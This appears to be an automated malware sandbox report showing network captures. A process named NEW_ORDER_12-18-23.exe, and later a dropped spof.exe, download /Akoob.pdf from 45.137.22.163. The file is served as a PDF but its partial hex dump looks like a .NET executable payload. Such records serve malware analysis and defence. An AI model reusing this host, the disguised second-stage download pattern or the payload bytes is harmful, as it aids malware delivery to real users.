                                        Dec 18, 2023 14:31:27.808173895 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.808187962 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808224916 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808263063 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.808334112 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808388948 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808433056 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808475971 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808501959 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.808521032 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808563948 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.808590889 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808644056 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808685064 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.808696985 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808748960 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808758974 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808788061 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.808804035 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808857918 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808907986 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808937073 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.808959961 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.808995008 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809003115 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809051037 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809089899 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809108973 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809154987 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809165955 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809197903 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809217930 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809238911 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809278965 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809282064 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809295893 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809305906 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809340000 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809369087 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809381962 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809393883 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809418917 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809426069 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809437037 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809458971 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809463978 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809472084 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809513092 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809515953 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809526920 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809539080 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809561014 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809566975 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809571981 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809581995 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809607029 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809623957 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809634924 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809652090 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809663057 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809665918 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809676886 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809714079 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809734106 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809746027 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809770107 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809792995 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809834003 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809844971 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809854984 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809879065 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.809962034 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.809972048 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810007095 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.810026884 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810056925 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810066938 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810091019 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810096025 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.810148001 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810159922 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810170889 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810188055 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.810210943 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.810262918 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810364962 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810379982 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810405016 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.810532093 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810615063 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810626030 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810669899 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.810723066 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810775995 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810786963 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810820103 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.810868025 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810898066 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810929060 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810939074 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.810941935 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810962915 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.810980082 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.811019897 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.811062098 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.811098099 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.811141968 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.811167955 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.811187029 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.811240911 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.811297894 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.811307907 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.811337948 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.861166000 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.904129982 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.044634104 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.044717073 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.044764996 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.044780970 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.044835091 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.044878006 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.044898987 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.044981956 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045018911 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.045063972 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045136929 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045181990 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045186043 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.045243979 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045284033 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.045300961 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045376062 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045414925 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.045416117 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045480967 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045516014 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.045542955 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045597076 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045636892 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.045643091 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045713902 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045753002 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.045759916 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045818090 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045856953 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.045892000 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.045993090 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046030045 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.046097994 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046154022 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046185017 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.046250105 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046272993 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046312094 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.046333075 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046427965 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046473980 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.046503067 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046586037 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046629906 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.046648026 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046694040 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046734095 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.046762943 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046823978 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046879053 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.046897888 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.046973944 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.047017097 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.047023058 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.047095060 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.047137022 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.047156096 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.047209978 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.047246933 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.047280073 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.047355890 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.047394037 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.047422886 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.047930956 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.047971964 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.048002005 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048101902 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048136950 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048139095 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.048235893 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048273087 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.048302889 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048314095 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048393965 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048433065 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.048506975 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048582077 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048619986 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.048670053 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048687935 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048736095 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.048785925 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048841953 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048851967 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.048892021 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.048926115 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.049027920 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.049071074 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.049098969 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.049174070 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.049215078 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.049238920 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.049307108 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.049351931 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:28.049384117 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.049470901 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:28.049782991 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:29.226035118 CET4973780192.168.2.445.137.22.163

                                        HTTP Request Dependency Graph

                                        • 45.137.22.163

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.44972945.137.22.163807272C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 18, 2023 14:31:03.739526987 CET72OUTGET /Akoob.pdf HTTP/1.1
                                        Host: 45.137.22.163
                                        Connection: Keep-Alive
                                        Dec 18, 2023 14:31:04.294747114 CET72OUTGET /Akoob.pdf HTTP/1.1
                                        Host: 45.137.22.163
                                        Connection: Keep-Alive
                                        Dec 18, 2023 14:31:04.534419060 CET1286INHTTP/1.1 200 OK
                                        Content-Type: application/pdf
                                        Last-Modified: Mon, 18 Dec 2023 07:44:11 GMT
                                        Accept-Ranges: bytes
                                        ETag: "8420c6fd8531da1:0"
                                        Server: Microsoft-IIS/8.5
                                        Date: Mon, 18 Dec 2023 13:31:04 GMT
                                        Content-Length: 665600
                                        Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 70 00 00 00 0c 00 0a 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 08 00 38 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 08 00 34 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 6c 00 6c 00 64 00 2e 00 67 00 64 00 74 00 68 00 41 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 0a 00 3c 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 6c 00 6c 00 64 00 2e 00 67 00 64 00 74 00 68 00 41 00 00 00 65 00 6d 00 61 00 4e 00 6c 00
                                        Data Ascii: >p00.0.0.1noisreV ylbmessA80.0.0.1noisreVtcudorP4emaNtcudorP"lld.gdthAemaneliFlanigirO<skramedarTlageL*thgirypoClageL&lld.gdthAemaNl
                                        Dec 18, 2023 14:31:04.534451962 CET1286INData Raw: 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 0a 00 34 00 00 00 30 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 00 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 65 00 6c 00 69 00 46 00 01 00 08 00 30 00 00 00 00 00 00 00 00 00 6e 00 6f 00 69 00
                                        Data Ascii: anretnI40.0.0.1noisreVeliF0noitpircseDeliF*emaNynapmoC"stnemmoC0b400000ofnIeliFgnirtS,
                                        Dec 18, 2023 14:31:04.534463882 CET1286INData Raw: d3 fb c8 d8 a1 e6 81 02 44 14 53 d6 2f 10 5d e9 b6 c7 aa 26 5e 5a 51 c0 40 b3 40 f6 1e 25 62 49 b4 08 21 a6 79 43 8e fd 98 71 93 6b 90 11 22 89 5c d7 be ff ff 5b b1 8b 44 f7 af 69 80 98 d8 fd 46 95 01 a8 30 46 13 47 87 c6 2a f5 7c 0f af c1 bd ce
                                        Data Ascii: DS/]&^ZQ@@%bI!yCqk"\[DiF0FG*|$ pVjx=7:\55quw}jBHHt@9IH$dceK:J}kG&J0y-{HD0 0MKDXBg
                                        Dec 18, 2023 14:31:04.534478903 CET1286INData Raw: 70 25 3b 54 85 53 cb 2e 88 f7 da ca f7 d1 01 ae bf fe cd 67 a8 a8 60 c9 d7 74 94 8b e1 67 4e fa 83 6e 84 b5 53 82 bd 2d d5 9c b3 27 4b 26 94 cd 98 1e e6 37 da 49 66 cd bc a2 8e 28 18 cd 7e dd 9d de e4 b8 e2 3f 6d ac d9 98 21 c4 0b 07 b0 b5 ba d2
                                        Data Ascii: p%;TS.g`tgNnS-'K&7If(~?m!BvF%;@E!K#EsTF$dYXoFC(vVCQ%\IA%+6--ZPZ+%%f~fj&0(_bj
                                        Dec 18, 2023 14:31:04.771440029 CET1286INData Raw: 75 57 1f ca dd e7 8c 68 29 06 68 89 0e d9 aa d9 68 05 82 d7 a5 8d 68 40 80 86 91 a8 40 80 85 ab 75 57 07 9e 81 9e 9e 68 14 09 d6 86 d6 a2 68 29 06 68 09 a1 e8 8f b5 68 40 80 86 91 a8 40 80 85 96 75 57 1d 99 ad 8a 68 8c 03 68 02 b5 dd a5 b0 68 40
                                        Data Ascii: uWh)hhh@@uWhh)hh@@uWhhh@@uWhWhh@@uWhWhh@@uWh)hhh@@uWh91h@@uWh9h@@uWh99
                                        Dec 18, 2023 14:31:04.771472931 CET1286INData Raw: f3 c0 9e 97 68 29 02 68 1a fd c2 a7 a5 68 40 80 86 91 a8 40 80 85 98 75 57 1c f0 93 b0 bf 68 89 11 eb 90 bc b1 68 0b 85 82 f4 8e 68 40 80 86 91 a8 40 80 86 90 75 57 09 c8 f7 a5 84 68 8c 04 68 09 c6 dd a9 80 68 40 80 86 91 a8 40 80 85 9a 75 57 0f
                                        Data Ascii: h)hh@@uWhhh@@uWhhh@@uWhhZh@@uWh)hh@@uWhhh@@uWh9wh@@uWhwWhh@@uWh9h@@uW
                                        Dec 18, 2023 14:31:04.771519899 CET1286INData Raw: bb 75 57 11 d3 ef 98 a6 68 57 11 ef 9f cb 80 68 77 13 e1 8d 8d 9e 68 40 80 86 91 a8 40 80 86 99 75 57 1d d0 d6 af a9 68 14 27 ac b6 a9 68 8c 05 68 03 ce b3 a5 ae 68 40 80 86 91 a8 40 80 86 bd 75 57 08 fe dc f2 89 68 77 1f 92 a8 98 ae 68 40 80 86
                                        Data Ascii: uWhWhwh@@uWh'hhh@@uWhwh@@uWh9h@@uWhh)hh@@uWh'hhh@@uWhWh)hh@@uWhwh@@uWhwh
                                        Dec 18, 2023 14:31:04.771600008 CET1286INData Raw: 0d 0d 68 02 0d 04 60 17 68 a0 04 35 60 80 89 95 61 0b 68 87 06 0d 12 68 02 0d 04 60 01 a2 68 87 0a 0d 11 68 02 0d 04 60 01 96 68 87 01 0d 0a 68 00 0d 04 60 01 bc 68 a0 04 35 60 80 89 94 61 03 99 68 01 7c 89 01 98 68 02 8c 68 04 60 35 68 87 01 0d
                                        Data Ascii: h`h5`ahh`hh`hh`h5`ah|hh`5hh`h5`ahh`h@-h`h5`ahh`h5`ahh`hh`'h5`ah-hhh`h5`a<hh`hh`
                                        Dec 18, 2023 14:31:04.771680117 CET1286INData Raw: 04 b7 68 87 14 01 86 68 03 92 68 02 68 02 0d 04 60 04 ae 68 06 7c 14 3f 68 02 bd 68 04 60 02 87 68 a0 04 66 60 80 89 95 61 03 96 68 87 0a 0d 0c 68 02 0d 04 60 02 9d 68 87 01 0d 02 68 00 0d 03 60 08 7c 04 ac 68 01 7c 89 01 ba 68 10 68 04 60 03 9e
                                        Data Ascii: hhhh`h|?hh`hf`ahh`hh`|h|hh`h2h%hh`hhhh`hh`hf`ah|.hh`hhhh`hh!hh`hh`|hhhh` hhhh`hh`hf`
                                        Dec 18, 2023 14:31:04.771745920 CET1286INData Raw: 60 01 90 68 87 01 0d 0e 68 00 0d 04 60 03 a0 68 87 89 11 68 03 87 68 0f 68 02 0d 04 60 03 a8 68 87 89 0b 68 35 68 06 68 00 0d 04 60 02 be 68 0a 7c 89 13 68 31 68 03 60 08 7c 02 b3 68 87 14 2b 68 02 82 68 18 68 02 0d 04 60 02 8b 68 a0 04 35 60 80
                                        Data Ascii: `hh`hhhh`hh5hh`h|h1h`|h+hhh`h5`ah|$hh`h|hh`h5`a*hh`h|;hh`h|7hh`|hhhh`"hh`h!hhh`h6hhh`h5`ahh
                                        Dec 18, 2023 14:31:04.771786928 CET1286INData Raw: a0 04 35 60 80 89 95 61 07 68 87 01 0d 0b 68 00 0d 04 60 02 b4 68 a0 04 66 60 80 89 95 61 05 93 68 87 89 3a 68 01 b9 68 0e 68 00 0d 03 60 08 7c 04 82 68 87 01 0d 0c 68 00 0d 04 60 16 68 a0 04 66 60 80 89 95 61 1b 68 87 0b 0d 09 68 00 0d 04 60 21
                                        Data Ascii: 5`ahh`hf`ah:hhh`|hh`hf`ahh`!hh`hf`ah|/hh`h5`ah|hh`h|<hh`|<hh`h1]`hh`#hh6hh`hhhh`h5`ah|(hh`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.44973045.137.22.163807500C:\Users\user\AppData\Roaming\spof.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 18, 2023 14:31:19.751796961 CET72OUTGET /Akoob.pdf HTTP/1.1
                                        Host: 45.137.22.163
